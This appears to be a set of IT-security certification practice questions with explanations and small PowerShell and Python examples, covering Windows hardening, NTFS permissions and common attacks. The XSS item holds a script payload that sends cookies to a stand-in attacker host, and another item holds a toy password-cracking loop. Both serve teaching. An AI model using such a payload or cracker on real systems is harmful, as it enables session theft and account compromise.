The key sequence Windows Key + L immediately locks the desktop on Windows systems. Once the screen is locked, the user will be required to enter their password (or other authentication method) to regain access. This is a simple and effective way to protect the computer when the user steps away, ensuring that sensitive information remains secure. Why the other key sequences are incorrect: Windows Key + Right Arrow: This combination is used to snap the active window to the right side of the screen (for a split-screen view) and does not lock the computer. Windows Key + D: This minimizes all open windows and shows the desktop, but it does not lock the screen. Pressing it again restores the windows. Windows Key + X: This opens the Quick Link menu (or Power User menu) but does not lock the computer. Key Takeaway: The Windows Key + L shortcut is the quickest and most reliable way to lock the computer, requiring authentication before access is restored.
What can a system administrator do to prevent Windows users from unintentionally installing malware from USB thumb drives and DVD-ROMs that contain malicious code?
Disable AutoRun and AutoPlay.
Enable BIOS/UEFI passwords.
Enable data encryption.
Set restrictive user permissions.
Disabling AutoRun and AutoPlay is one of the most effective measures to prevent Windows users from unintentionally installing malware from USB thumb drives and DVD-ROMs that may contain malicious code. AutoRun and AutoPlay are features in Windows that automatically execute programs or open files when a USB device, CD/DVD, or other media is inserted into the computer. These features can be exploited by malware, which may automatically run upon insertion, thereby infecting the system without any user interaction. By disabling these features, the system will not automatically execute anything from a USB drive or DVD-ROM, and the user will need to manually initiate any programs or files they choose to open, thereby preventing automatic execution of malicious code. Why the other options are less effective for this purpose: Enable BIOS/UEFI passwords: While setting a BIOS/UEFI password can prevent unauthorized users from booting the system or changing critical system settings (such as boot order), it doesn’t address the specific issue of malware installation from external drives like USB thumb drives and DVDs. Enable data encryption: Data encryption helps protect data from unauthorized access, but it doesn’t prevent malware from executing. Encrypted files would still be accessible to malicious software if the user runs an infected program. Set restrictive user permissions: Setting restrictive user permissions can limit the ability of users to install software or modify system settings. However, this approach is less effective at preventing the automatic execution of malware from external media, which can happen even under restricted user permissions. Disabling AutoRun and AutoPlay specifically targets the method malware often uses to spread through USB or DVD media. Key Takeaway: Disabling AutoRun and AutoPlay prevents malicious software from automatically executing when external devices are connected to the system, significantly reducing the risk of malware infections from USB drives and DVDs.
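One common way to enforce this machine-wide is the NoDriveTypeAutoRun registry value, where 0xFF disables AutoRun for every drive type. A sketch follows; in most environments this would be deployed through Group Policy rather than run by hand:

```powershell
# Create the policy key if it does not exist, then disable AutoRun on all drive types (0xFF).
$key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name "NoDriveTypeAutoRun" -Value 0xFF -Type DWord
```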
Which user account should you disable on a Windows 11 Pro workstation for better security?
Administrator
Default Account
Power User
Guest
The Guest account on a Windows 11 Pro workstation is meant to provide temporary access for users who don’t have their own account. However, it poses a security risk because it often has minimal restrictions and can be easily exploited by malicious actors. Disabling the Guest account improves security by preventing unauthorized users from accessing the system with a default, low-privileged account. In most environments, guest access isn’t necessary and is better turned off. Why the other accounts are less critical to disable: Administrator: The Administrator account is a highly privileged account and should only be used when necessary. However, it is typically disabled by default on Windows 11. If it’s enabled, it should be protected with strong passwords, but it’s not the first account to disable for security purposes. DefaultAccount: The DefaultAccount is a system account used by Windows for internal operations, and it’s not meant for user login. It’s disabled by default, so there’s no need to worry about it being used unless it’s explicitly activated, which would be rare. Power User: Power User is a legacy account type that is not commonly used in modern Windows operating systems. This account has more permissions than a standard user but less than an administrator. It’s generally not enabled by default, and if it is, it should be handled carefully. However, it does not pose the same immediate risk as the Guest account. Key Takeaway: Disabling the Guest account is the most effective way to increase security because it prevents unauthorized access using a default account with potentially low-level privileges.
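Disabling the account takes a single elevated command; either of the following built-in options does the job:

```powershell
Disable-LocalUser -Name "Guest"     # LocalAccounts module
# or, equivalently:
net user Guest /active:no
```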
When a user is conducting online research, too many advertisements keep appearing on his screen, making it impossible for him to complete his task. To address this issue, what can you configure in his browser?
Pop-up blocker
Certificate
Private-browsing mode
Password manager
A pop-up blocker is a feature that can be enabled in most modern web browsers to prevent unwanted pop-up windows, often used for advertisements, from appearing while browsing. Pop-up blockers are specifically designed to stop intrusive advertisements from interrupting the user’s experience. By configuring this in the browser, you can help reduce the number of pop-ups that appear during online research. Why the other options are incorrect: Certificate: A certificate is used for securing connections between websites and browsers (e.g., SSL/TLS certificates for HTTPS). It does not prevent advertisements from appearing. Private-browsing mode: This mode, also known as Incognito or InPrivate browsing, prevents the browser from saving browsing history, cookies, or site data. While it can improve privacy, it does not block advertisements or pop-ups. Password manager: A password manager helps store and manage user credentials for websites securely. It has no role in blocking pop-ups or advertisements. Conclusion: To solve the issue of too many advertisements, you should configure the browser’s pop-up blocker to prevent these unwanted ads from interrupting the user’s tasks.
You’re configuring password requirements, including the length and expiration, for multiple Windows 11 Pro workstations. What utility on the workstation can you use to do this?
Administrative Tools
Local Security Policy
User Accounts in Control Panel.
Local Users and Groups.
To configure password requirements, such as length, complexity, and expiration, on a Windows 11 Pro workstation, you would use the Local Security Policy utility. This tool allows you to set various security policies on a local computer, including password policies. Here’s how you can configure password requirements using Local Security Policy: Press Win + R, type secpol.msc, and press Enter. In the Local Security Policy window, navigate to Account Policies > Password Policy. From there, you can configure options like: Minimum password length Password complexity requirements Maximum password age (expiration) Minimum password age, etc. Why the other options are incorrect: Administrative Tools: While Administrative Tools contains several useful utilities, the Local Security Policy is the specific tool for managing password policies, not the general Administrative Tools menu. User Accounts in Control Panel: This utility is used for managing user accounts (such as creating, deleting, or modifying user accounts) but does not allow you to configure advanced password policies like length and expiration. Local Users and Groups: This utility is used to manage local user accounts and groups, but it does not allow you to set password policies. It’s focused on account and group management. Summary: To configure password policies (including length, expiration, etc.) on a Windows 11 Pro workstation, the correct tool to use is Local Security Policy.
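The same password settings that secpol.msc exposes can also be set from an elevated command prompt; here is a short sketch with example values:

```powershell
# Show the current local account policy, then require 12-character passwords,
# expire them every 90 days, and remember the last 5 passwords (values are examples).
net accounts
net accounts /minpwlen:12 /maxpwage:90 /uniquepw:5
```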
You want to establish a new policy that uses BitLocker to encrypt all company drives. Which operating system needs updating?
Windows 11 Home
Windows 11 Pro
Windows 10 for Workstations.
Windows 10 Pro
BitLocker is a full-disk encryption tool that is available in certain editions of Windows, but not all. Here’s how it breaks down for the listed operating systems: Windows 11 Home: BitLocker is not available in Windows 11 Home. Users must upgrade to Windows 11 Pro or another compatible edition to use BitLocker for full disk encryption. Windows 11 Pro: BitLocker is available in Windows 11 Pro, so no update is necessary here. It can be used to encrypt drives. Windows 10 for Workstations: This edition includes BitLocker as well, so it does not need updating either. It supports full disk encryption, just like Windows 10 Pro. Windows 10 Pro: BitLocker is available in Windows 10 Pro, so no update is necessary here either. Summary: If you need BitLocker for encryption, the system must be running Windows 11 Pro or Windows 10 Pro at the very least. Windows 11 Home will need an upgrade to Windows 11 Pro to access BitLocker.
What is TRUE about NTFS and share permissions on a Windows 11 workstation?
NTFS permissions can be applied at the file or folder level, and share permissions can only be applied at the folder level.
Both NTFS and share permissions can be applied only at the folder level.
NTFS permissions can be applied only at the folder level, but share permissions can be applied to files and folders.
Both NTFS and share permissions support inheritance.
NTFS permissions: These can be applied at both the file and folder levels on an NTFS-formatted volume. This means you can set different permissions for individual files within a folder, giving you fine-grained control over access. Share permissions: These only apply at the folder level. When a folder is shared over the network, share permissions are set to control access to that entire folder. Share permissions do not apply to individual files within the shared folder. Why the other options are incorrect: “Both NTFS and share permissions can be applied only at the folder level”: This is incorrect because NTFS permissions can also be applied at the file level, not just the folder level. “NTFS permissions can be applied only at the folder level, but share permissions can be applied to files and folders”: This is incorrect because share permissions apply only to folders, not to individual files. “Both NTFS and share permissions support inheritance”: While NTFS permissions support inheritance, share permissions do not support inheritance. Share permissions must be set manually for each shared folder, and they do not propagate down to subfolders or files. Key Takeaway: NTFS provides more granular control by allowing permissions on both files and folders. Share permissions only apply to folders that are shared over the network.
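A small sketch that shows the difference in granularity (the paths, share name, and group name are placeholders):

```powershell
# NTFS permission granted on a single file inside the folder.
icacls "D:\Projects\spec.docx" /grant "Developers:(RX)"

# Share permission applied to the shared folder as a whole - it cannot target one file.
net share Projects="D:\Projects" /GRANT:Developers,READ
```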
What is NOT a way to know the date and time when a file is changed?
Open the folder in File Explorer and click Date Modified to sort the files by the date they were last modified.
Type archive at a command prompt.
Right-click each file and choose Properties, and then Advanced to see whether the archive bit is set.
Type attrib at a command prompt.
The term “archive” is not a valid command in the context of determining the date and time a file was changed. The archive bit (a file attribute) indicates whether a file has been modified since the last backup, but typing “archive” by itself at a command prompt will not provide any useful information. Here’s why the other options are correct methods for checking the date and time when a file is changed: Open the folder in File Explorer and click Date Modified to sort the files by the date they were last modified: This is a straightforward method to see when files were last changed. By sorting files by “Date Modified,” you can easily determine the last modification time for each file. Right-click each file and choose Properties, and then Advanced to see whether the archive bit is set: The archive bit is used to track whether a file has been modified since the last backup. While it does not directly show the date and time of modification, it indicates that a file has been altered since it was last backed up. Type attrib at a command prompt: The attrib command shows file attributes, including the archive bit. You can use this to see if the archive bit has been set, which typically indicates that the file has been modified. Summary: The “archive” command by itself doesn’t give any useful information about file modification, while the other options help provide timestamps or related details.
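For example (the folder path is a placeholder), attrib shows the archive attribute while a directory listing shows the actual last-write timestamps:

```powershell
attrib "C:\Reports\*.docx"                # an "A" flag marks files changed since the last backup

Get-ChildItem "C:\Reports" |              # actual modification timestamps, newest first
    Sort-Object LastWriteTime -Descending |
    Select-Object Name, LastWriteTime
```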
How can a computer user set up a new Windows 11 Home computer with a local account?
Local accounts are never available in Windows 11.
Press F10 during bootup to create a local account.
They must switch to the Pro edition if they want to use a local account after setup.
That option is not available. They must use a Microsoft account.
In Windows 11 Home, Microsoft has removed the option to set up a local account directly during the initial setup process. Users are required to sign in with a Microsoft account. Here’s the process for setting up a new Windows 11 Home computer: During the setup, you must provide a Microsoft account (email and password) to proceed. If you don’t want to use a Microsoft account, you can temporarily disconnect from the internet during the setup (e.g., by turning off Wi-Fi or unplugging Ethernet), which will force Windows to allow the creation of a local account instead. However, in Windows 11 Home, creating a local account is not the default option during the initial setup, unlike in the Pro or Enterprise editions, where it is possible to choose between a local or Microsoft account during the setup. Why the other options are incorrect: “Local accounts are never available in Windows 11”: This is not true, as local accounts are available, but their setup process is restricted in Windows 11 Home. “Press F10 during bootup to create a local account”: This is not a valid method for creating a local account on Windows 11 Home. “They must switch to the Pro edition if they want to use a local account after setup”: This is incorrect. Switching editions is not required; even on Windows 11 Home, the account can be changed to a local account after setup through Settings > Accounts.
What is TRUE about the network access of a new user that has joined your company as a network administrator?
They should have just one user account, with administrator-level permissions.
They should have two user accounts: one with user-level permissions and one with administrator-level permissions.
They should have just one user account, with standard user-level permissions.
They should have three user accounts: one with user-level permissions, one with administrator level permissions, and one with remote access administrator permissions.
When it comes to network administrators, security best practices dictate the use of separation of duties for different levels of access: User-level account: This account should be used for day-to-day activities such as checking emails, browsing the internet, and other standard tasks. The goal is to reduce the risk of accidental or malicious damage to the network when performing non-administrative tasks. Administrator-level account: This account should be used only for tasks that require elevated privileges, such as configuring servers, managing network security, or performing system maintenance. By using a separate account for administrative tasks, the risk of performing a high-privilege task by accident (such as downloading malware or executing a malicious script) is minimized. This approach ensures that: The administrator can work in a least-privilege environment most of the time. They can switch to the administrator account only when elevated access is needed. Why the other options are incorrect: One account with administrator-level permissions: This would pose a security risk, as the administrator would always be operating with elevated privileges, increasing the chances of accidental system misconfigurations or security breaches. One account with standard user-level permissions: This would restrict the network administrator from performing their administrative duties, limiting their ability to manage the network. Three accounts: This is excessive and complicates access control management. In most cases, two accounts (one with user-level permissions and one with administrator-level permissions) are sufficient.
A user on your network is trying to open a folder named Projects on a local NTFS volume. Their user account is in the Developers group, which has Read & Execute permissions on the folder. The user’s user account has Full Control permissions on the folder. What are the user’s effective permissions on the folder?
No access
Read & Execute
Full control
Read
When determining the effective permissions a user has on a resource, both the permissions assigned to the user account and the permissions assigned to the groups the user belongs to are considered. Contrary to a common assumption, it is not the most restrictive permission that wins when combining NTFS entries. In your scenario: The user’s account has Full Control permissions on the folder. The user is also part of the Developers group, which has Read & Execute permissions on the folder. Since Full Control is more permissive than Read & Execute, the user’s effective permissions will be determined by the highest permission level, which is Full Control. This means the user can read, modify, and execute files, and can also change the permissions on the folder if needed. Key Takeaway: In NTFS, if a user has different permissions from a group they belong to, the most permissive combination of permissions takes effect (unless an explicit Deny entry is present, which always overrides an Allow). So, Full Control (from the user’s individual permissions) overrides Read & Execute (from the group).
Users need to be able to access a variety of systems on your network, including a Windows domain, a cloud storage site, and order processing software. You should set up the network so that users’ login credentials are valid for several systems, eliminating the need for them to remember different usernames and passwords for each site. Which technology should you use?
UAC
SSO
EFS
MDM
Single Sign-On (SSO) is a technology that allows users to log in once and gain access to multiple systems or applications without needing to re-enter their credentials for each one. In your scenario: Users need to access multiple systems (Windows domain, cloud storage, and order processing software). SSO enables users to authenticate once and access all the required systems without remembering different usernames and passwords for each. Why the other options are incorrect: UAC (User Account Control): A security feature in Windows that helps prevent unauthorized changes to the system. It does not manage user authentication across multiple systems. EFS (Encrypting File System): A Windows feature for encrypting files on a local disk, unrelated to managing multiple system logins. MDM (Mobile Device Management): A system for managing mobile devices, like smartphones and tablets, including app distribution and security policies, but not directly related to handling user credentials for different systems. SSO streamlines access and improves security by reducing the number of passwords users need to remember.
You are configuring a wireless network for a small office. According to a good rule of thumb, what should you do when considering access point placement?
Place them in walls or ceilings for protection.
Place them near metal objects so the signal will reflect better.
Place them in the center of the network area.
Place them at the edge of the network area and focus them in the proper direction.
When configuring a wireless network, the general rule of thumb for access point (AP) placement is to place them in the center of the network area. This ensures that the wireless signal is evenly distributed throughout the coverage area, providing optimal connectivity for all users. Central placement helps minimize dead spots and ensures that the signal strength is distributed uniformly, offering better coverage for devices connected to the network. It also ensures that users, regardless of their location within the office, will experience a strong and consistent connection, which is essential for network reliability and performance. Why the other options are incorrect: Place them in walls or ceilings for protection: While placing access points on walls or ceilings might improve coverage in some environments, protection from damage isn’t the primary consideration when placing APs. Access points need to be placed for optimal signal coverage rather than just protection. Also, placing them inside walls can sometimes limit signal strength. Place them near metal objects so the signal will reflect better: Metal objects can interfere with wireless signals, not enhance them. Wireless signals reflect unpredictably off metal surfaces and can cause signal degradation or interference, which will actually reduce the quality of your network. Place them at the edge of the network area and focus them in the proper direction: Placing access points at the edges of the coverage area typically leads to uneven coverage, with some areas having weak signals. It’s best to place APs centrally, unless there’s a specific reason to focus the signal in a particular direction (such as directional antennas). Conclusion: To maximize coverage and ensure the best possible network performance, placing your access points in the center of the network area ensures optimal coverage and reduces the risk of weak spots in your wireless network.
Your web server just crashed as a result of a flood of responses to a packet that looked like it came from your server but was actually sent by another host. What type of attack is this?
Evil twin attack
Distributed DoS attack
Whaling attack
Denial-of-service attack
This scenario describes a Denial-of-Service (DoS) attack, specifically a reflection or amplification attack, where: An attacker spoofs your server’s IP address in requests sent to third-party servers. Those servers then send a flood of responses back to your server, thinking your server made the requests. This overwhelms your server, causing it to crash. This type of DoS attack doesn’t necessarily require a botnet (which would make it a Distributed DoS, or DDoS). The key here is the flood of responses to a spoofed packet, leading to service disruption. Why the other options are incorrect: Evil twin attack: Involves rogue Wi-Fi access points, not web server flooding. Distributed DoS attack: Could be correct if multiple systems were involved, but the question doesn’t specify that. Whaling attack: A phishing attack targeting executives—completely unrelated to server attacks.
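To make the “flood of responses” concrete, here is a small back-of-the-envelope calculation (plain Python arithmetic with assumed, illustrative packet sizes) showing how a reflection attack amplifies traffic: a small spoofed request triggers a much larger response aimed at the victim.

```python
# Assumed, illustrative numbers -- real sizes vary by protocol and reflector.
request_bytes = 60        # small spoofed query sent to a third-party server
response_bytes = 3000     # large reply sent back to the victim's (spoofed) address
requests_per_second = 50_000

amplification_factor = response_bytes / request_bytes
victim_traffic_mbps = requests_per_second * response_bytes * 8 / 1_000_000
attacker_traffic_mbps = requests_per_second * request_bytes * 8 / 1_000_000

print(f"Amplification factor: {amplification_factor:.0f}x")
print(f"Traffic hitting the victim: {victim_traffic_mbps:.0f} Mbit/s")
print(f"Traffic the attacker had to send: {attacker_traffic_mbps:.0f} Mbit/s")
```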
To save money on hardware, your company allows employees to use their personal devices for work-related purposes. What is this called?
SSO
BYOD
UAC
MDM
BYOD stands for Bring Your Own Device, a policy that allows employees to use their personal devices (like smartphones, tablets, or laptops) for work-related tasks. It’s often adopted to reduce hardware costs and increase flexibility. In your scenario: Employees are using their own devices to do company work. This is a classic example of a BYOD policy. Why the other options are incorrect: SSO (Single Sign-On): A login method that lets users access multiple systems with one set of credentials. UAC (User Account Control): A Windows security feature that prevents unauthorized system changes. MDM (Mobile Device Management): A tool used to manage and secure mobile devices, often used with BYOD, but not the term for the policy itself.
While looking through the Event Viewer logs, you see that numerous attempts to access the corporate bank account information have failed. The attempts are being made by an employee who was hired just one month ago. What type of attack is this?
Social engineering
Insider threat
Whaling
Evil twin
An insider threat involves someone within the organization, such as an employee, contractor, or business partner, who poses a security risk. This can be due to malicious intent or negligence. In this case: The attacker is an employee. They’re attempting to access sensitive financial information (corporate bank accounts). These unauthorized access attempts suggest malicious intent or curiosity. This behavior fits the definition of an insider threat. Why the other options are incorrect: Social engineering: Involves tricking someone into giving up information—usually external and psychological. Whaling: A phishing attack targeting high-level executives—not the case here. Evil twin: A fake Wi-Fi access point used for intercepting data—not related to internal logins.
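One practical follow-up is to quantify the pattern before escalating. The hedged sketch below (plain Python over an assumed, simplified log export; it does not use the real Windows Event Viewer API) counts failed access attempts per user and resource so that a spike from a single account, like the new hire’s, stands out.

```python
from collections import Counter

# Assumed export format: "timestamp,username,resource,result" per line.
sample_log = """\
2024-05-01T09:02:11,jsmith,corp-bank-share,FAILURE
2024-05-01T09:02:45,jsmith,corp-bank-share,FAILURE
2024-05-01T09:03:10,jsmith,corp-bank-share,FAILURE
2024-05-01T10:15:02,mlee,payroll,SUCCESS
"""

failures = Counter()
for line in sample_log.splitlines():
    _timestamp, user, resource, result = line.split(",")
    if result == "FAILURE":
        failures[(user, resource)] += 1

THRESHOLD = 3  # arbitrary cutoff for "numerous" failed attempts
for (user, resource), count in failures.items():
    if count >= THRESHOLD:
        print(f"Possible insider threat: {user} failed to access {resource} {count} times")
```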
Which types of security threats directly attack user passwords? (Choose two.)
Zombie/botnet
Dictionary attack
Spoofing
Brute-force
Both dictionary attacks and brute-force attacks are direct methods used by attackers to crack or guess user passwords: Dictionary attack: Uses a predefined list of likely passwords (like words from a dictionary or common passwords). Fast and efficient for weak passwords. Targets user behavior (e.g., using “password123”). Brute-force attack: Systematically tries every possible combination of characters until the correct password is found. Slower but more thorough. Can crack stronger passwords given enough time and computing power. Why the other options are incorrect: Zombie/botnet: A group of infected devices used to launch attacks (like DDoS), not specifically for password cracking. Spoofing: Impersonating a trusted source to deceive users—not directly used to guess or crack passwords.
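The difference between the two approaches is easy to see in code. This toy sketch (Python standard library only, against a deliberately weak 4-character password and an unsalted SHA-256 hash chosen just for the demo) tries a short word list first, then falls back to exhausting every lowercase combination.

```python
import hashlib
import itertools
import string

def sha256(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()

# Toy target: an unsalted hash of a weak 4-letter password ("pass").
target_hash = sha256("pass")

# Dictionary attack: try a short list of likely candidates first.
wordlist = ["123456", "password", "qwerty", "letmein", "pass"]
dictionary_hit = next((w for w in wordlist if sha256(w) == target_hash), None)
print("Dictionary attack found:", dictionary_hit)

# Brute-force attack: systematically try every 4-character lowercase string.
def brute_force(target: str, length: int = 4):
    for combo in itertools.product(string.ascii_lowercase, repeat=length):
        candidate = "".join(combo)
        if sha256(candidate) == target:
            return candidate
    return None

print("Brute force found:", brute_force(target_hash))  # up to 26**4 = 456,976 tries
```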
You are educating users of mobile devices about possible security risks. What might put users at greater risk for an on-path attack?
Unintended Wi-Fi connection.
Unauthorized account access.
Unauthorized camera activation.
Unauthorized location tracking.
An on-path attack (also known as a man-in-the-middle (MITM) attack) occurs when an attacker secretly intercepts and possibly alters the communication between two parties who believe they are directly communicating with each other. Unintended Wi-Fi connections, especially to unsecured or rogue networks (like fake public Wi-Fi hotspots), increase the risk of on-path attacks because: Attackers can set up a fake Wi-Fi access point. When a user connects without realizing, the attacker can intercept data like login credentials, emails, or financial info. Why the other options are incorrect: Unauthorized account access: The result of an attack, not a cause or risk factor for an on-path attack. Unauthorized camera activation: A privacy concern, often from spyware, but not related to network interception. Unauthorized location tracking: Also a privacy concern, but not relevant to on-path attacks.
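A defense users can rely on even over untrusted Wi-Fi is TLS certificate validation, which is what makes interception harder for an on-path attacker. The sketch below uses only Python’s standard library and opens a connection with certificate verification enabled (the default for ssl.create_default_context()), so a rogue hotspot presenting a forged certificate causes the handshake to fail; example.com is just a placeholder host.

```python
import socket
import ssl

hostname = "example.com"  # placeholder; any HTTPS site works
context = ssl.create_default_context()  # verifies the server certificate and hostname

with socket.create_connection((hostname, 443), timeout=5) as sock:
    # If an on-path attacker substitutes their own certificate, this wrap fails
    # with ssl.SSLCertVerificationError instead of silently exposing the traffic.
    with context.wrap_socket(sock, server_hostname=hostname) as tls:
        print("Negotiated:", tls.version(), "with", tls.getpeercert()["subject"])
```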
Your server has crashed as a result of a botnet attack on your company’s website. What kind of attack did the botnet carry out?
Zero-day
Non-compliant system
Distributed denial of service
Brute-force
A Distributed Denial of Service (DDoS) attack happens when a botnet—a network of infected computers—floods a server or website with an overwhelming amount of traffic. The goal is to exhaust system resources, causing the server to crash or become unavailable to legitimate users. In your scenario: The server crashed. The crash was due to a botnet attack. This aligns exactly with the nature of a DDoS attack. Why the other options are incorrect: Zero-day: Exploits unknown software vulnerabilities; not directly tied to botnets or traffic overload. Non-compliant system: Refers to systems that don’t meet security standards—not an attack type. Brute-force: Attempts to guess credentials repeatedly—not related to crashing servers with traffic.
What kind of attack is similar to SQL injection but, instead of targeting a database, injects malicious HTML or JavaScript code into a website the user typically trusts, and then uses that trusted site to gather information from the user’s computer, since the system does not perceive the normally trusted website as a threat?
Zero-day attack
Cross-site scripting
SQL injection
Unprotected system
Cross-site scripting (XSS) is a type of attack where malicious code (usually JavaScript) is injected into a trusted website. When users visit the compromised site, their browsers run the malicious script, thinking it’s from a trusted source. This can lead to stolen cookies, session tokens, or other sensitive information. Here’s how it matches the scenario: The attack targets a website, not a database (unlike SQL injection). It uses HTML or JavaScript. The code is injected into a trusted site, making the user’s system not recognize it as a threat. It gathers information from users, often without their knowledge. Why the other options are incorrect: Zero-day attack: Exploits unknown vulnerabilities—not necessarily related to code injection. SQL injection: Targets databases through SQL queries, not browsers or users. Unprotected system: A vague term—not a specific type of attack.
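On the defensive side, the standard fix is to escape user-supplied input before echoing it into HTML, so injected script tags are rendered as text rather than executed. Here is a minimal sketch using Python’s built-in html module; the comment field and page template are made up purely for illustration.

```python
import html

user_comment = '<script>fetch("https://attacker.example/steal?c=" + document.cookie)</script>'

# Unsafe: the browser would execute the injected script on this trusted page.
unsafe_page = f"<p>Latest comment: {user_comment}</p>"

# Safe: escaping turns <, >, and quotes into entities, so it renders as harmless text.
safe_page = f"<p>Latest comment: {html.escape(user_comment)}</p>"

print(unsafe_page)
print(safe_page)
```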
The vice president of your company got an email from you asking for his username and password. He did not question the request because he assumed it was legitimate. What kind of attack is this?
Evil twin
Phishing
Whaling
Vishing
Whaling is a type of phishing attack that specifically targets high-profile individuals like executives, CEOs, or in this case, a vice president. The goal is usually to trick them into revealing sensitive information or credentials. In this scenario: The attacker pretends to be you (a trusted colleague) and emails the vice president. The email asks for his username and password. The VP assumes it’s legitimate due to your perceived authority or familiarity and does not question it. This is a whaling attack because: It’s a social engineering tactic. The target is a high-ranking executive. It uses email, which is common in phishing-based attacks. Here’s how the other options don’t fit: Evil twin: Involves a fake Wi-Fi access point to steal data. Phishing: General term for tricking people into giving up data—whaling is a subtype. Vishing: Voice phishing—done over the phone, not email.
You are configuring a router for a small office network. Users of the network ought to have access to regular, secure websites and be able to send and receive email. Those are the only connections allowed to the Internet. Which security feature should you set up to stop additional traffic from passing through the router?
Port forwarding/mapping.
MAC filtering.
Content filtering.
Port security/disabling unused ports.
To ensure that users in your small office network can only access secure websites (typically on port 443 for HTTPS) and send/receive emails (typically on ports 25, 465, or 587 for SMTP and 993 for IMAPS), you should set up port security by disabling unused ports on the router. This limits the flow of traffic to only the necessary ports for those specific services. Port security involves restricting which ports on the router or switch can be accessed by devices on the network. By closing unused ports (for example, blocking ports for file sharing, FTP, or other services not needed), you can prevent any unauthorized traffic from entering or leaving the network. Disabling unused ports means that any unnecessary communication channels are closed, so the router will only allow the specific types of traffic you have configured. Why the other options are incorrect: Port forwarding/mapping: This feature allows traffic from specific ports (typically from the outside world) to be forwarded to an internal device. It’s used when you want to expose certain services (e.g., a web server) to the internet. This isn’t about restricting unwanted traffic, but rather about opening specific ports for legitimate purposes. MAC filtering: While MAC filtering can control which devices can connect to the network based on their MAC address, it doesn’t stop traffic from certain ports or protocols. It’s mainly used for access control, not traffic control. Content filtering: Content filtering controls what users can access based on the content, such as blocking specific websites or categories. While helpful for preventing access to inappropriate content, it doesn’t directly control which ports or protocols can be used to access the internet. Conclusion: Setting up port security and disabling unused ports is the best way to ensure that only the necessary types of traffic (e.g., secure websites and email) are allowed to pass through the router, effectively securing the network by blocking other types of traffic.
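Conceptually, “disabling unused ports” boils down to an allowlist: traffic to a handful of approved destination ports passes, and everything else is dropped. The sketch below is not real router firmware or firewall syntax, just a Python illustration of that decision using the ports mentioned above (plus port 80 for the “regular” websites in the question).

```python
# Ports the office actually needs (assumed from the scenario: web + email).
ALLOWED_PORTS = {
    80: "HTTP", 443: "HTTPS",                          # regular and secure websites
    25: "SMTP", 465: "SMTPS", 587: "SMTP submission",  # sending email
    993: "IMAPS",                                      # receiving email
}

def filter_packet(destination_port: int) -> str:
    """Allow traffic only on approved ports; drop everything else."""
    if destination_port in ALLOWED_PORTS:
        return f"ALLOW ({ALLOWED_PORTS[destination_port]})"
    return "DROP (port not needed by this office)"

for port in (443, 587, 21, 3389):  # HTTPS, email submission, FTP, RDP
    print(port, "->", filter_packet(port))
```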
Your antivirus software is outdated, and several workstations on your network haven’t had their operating systems updated in over a year. Which kind of security risk does this pose?
Zero-day attack.
Zombie/botnet.
Brute-force attack.
Non-compliant systems.
In the context of security and IT governance, non-compliant systems refer to systems that do not meet established security standards, regulations, or best practices. If your antivirus software is outdated and the operating systems on several workstations haven’t been updated in over a year, those systems are not compliant with modern security requirements. Non-compliance can occur due to: Failure to apply critical security patches: Systems with outdated OS or antivirus software are vulnerable to attacks, which goes against compliance requirements. Lack of protection against current threats: Without up-to-date antivirus software, the systems cannot effectively detect or protect against new malware, which is a violation of security standards. Regulatory or industry requirements: Many industries, like finance and healthcare, have specific security regulations that require up-to-date software and antivirus protection. Failing to maintain these standards can lead to compliance issues. In many cases, compliance frameworks (like GDPR, HIPAA, PCI-DSS) require that systems have the latest updates installed to reduce vulnerabilities and risks. If your systems aren’t updated, they’re not compliant with these frameworks, which could result in legal, financial, or reputational consequences. Why the other options are incorrect: Zero-day attack: While outdated systems could increase the risk of a zero-day attack, the primary concern in this case is the lack of compliance rather than the specific type of attack. Zombie/botnet: This is when compromised devices are used for malicious activities, such as DDoS attacks, but it’s not directly about compliance. Brute-force attack: A brute-force attack attempts to guess passwords, but this isn’t specifically linked to outdated antivirus or OS updates. Non-compliance refers more to not meeting security or regulatory standards, not just attack types. In summary, when your systems are outdated and lack proper security software, they become non-compliant with security policies and regulations, which can open the door to various other risks.
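Organizations often automate exactly this kind of check. Below is a hedged Python sketch, with made-up inventory data and an arbitrary 30-day threshold, that flags workstations whose OS patches or antivirus definitions are older than the policy allows; it stands in for whatever compliance-scanning tool an environment actually uses.

```python
from datetime import date

MAX_AGE_DAYS = 30            # assumed policy: patches and AV definitions no older than 30 days
TODAY = date(2024, 6, 1)     # fixed date so the example is reproducible

# Made-up inventory: last OS patch date and last antivirus-definition update per host.
inventory = {
    "WS-01": {"os_patched": date(2023, 4, 10), "av_updated": date(2023, 3, 2)},
    "WS-02": {"os_patched": date(2024, 5, 20), "av_updated": date(2024, 5, 28)},
}

for host, status in inventory.items():
    issues = []
    if (TODAY - status["os_patched"]).days > MAX_AGE_DAYS:
        issues.append("OS patches out of date")
    if (TODAY - status["av_updated"]).days > MAX_AGE_DAYS:
        issues.append("antivirus definitions out of date")
    verdict = "NON-COMPLIANT: " + ", ".join(issues) if issues else "compliant"
    print(f"{host}: {verdict}")
```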
What risk is there when an operating system that has reached EOL is used?
Lack of security updates.
Lack of feature updates.
There is no technical support.
Technical support is very expensive.
When an operating system (OS) reaches its End of Life (EOL), the software vendor stops providing security updates and patches for that version of the OS. This poses a significant security risk, as any new vulnerabilities discovered after the EOL date will remain unpatched, making the system highly susceptible to exploitation by attackers. Key risks include: Exposed vulnerabilities: Without security patches, any weaknesses in the OS can be exploited by malware or hackers. Compliance issues: Certain industries require systems to be kept up to date with security patches to meet compliance standards. Why the other options are incorrect: Lack of feature updates: While this is true, it’s less critical than security updates in the context of risk. Lack of new features doesn’t usually expose the system to security vulnerabilities. There is no technical support: While technical support is unavailable, the primary concern with using an EOL OS is the lack of security updates rather than the absence of support. Technical support is very expensive: This may be true, but the real risk is the exposure to security threats without updates, not just the cost of support. Using an OS that has reached EOL is risky because it exposes the system to potential attacks. It is crucial to upgrade or switch to a supported OS to ensure continuous security protection.
A network user reports that a message appeared and his screen went blank. The message tells him that his files are no longer accessible and that he must enter his credit card number and pay $200 to get them back. What type of malware is this?
Spyware
Ransomware
Rootkit
Trojan
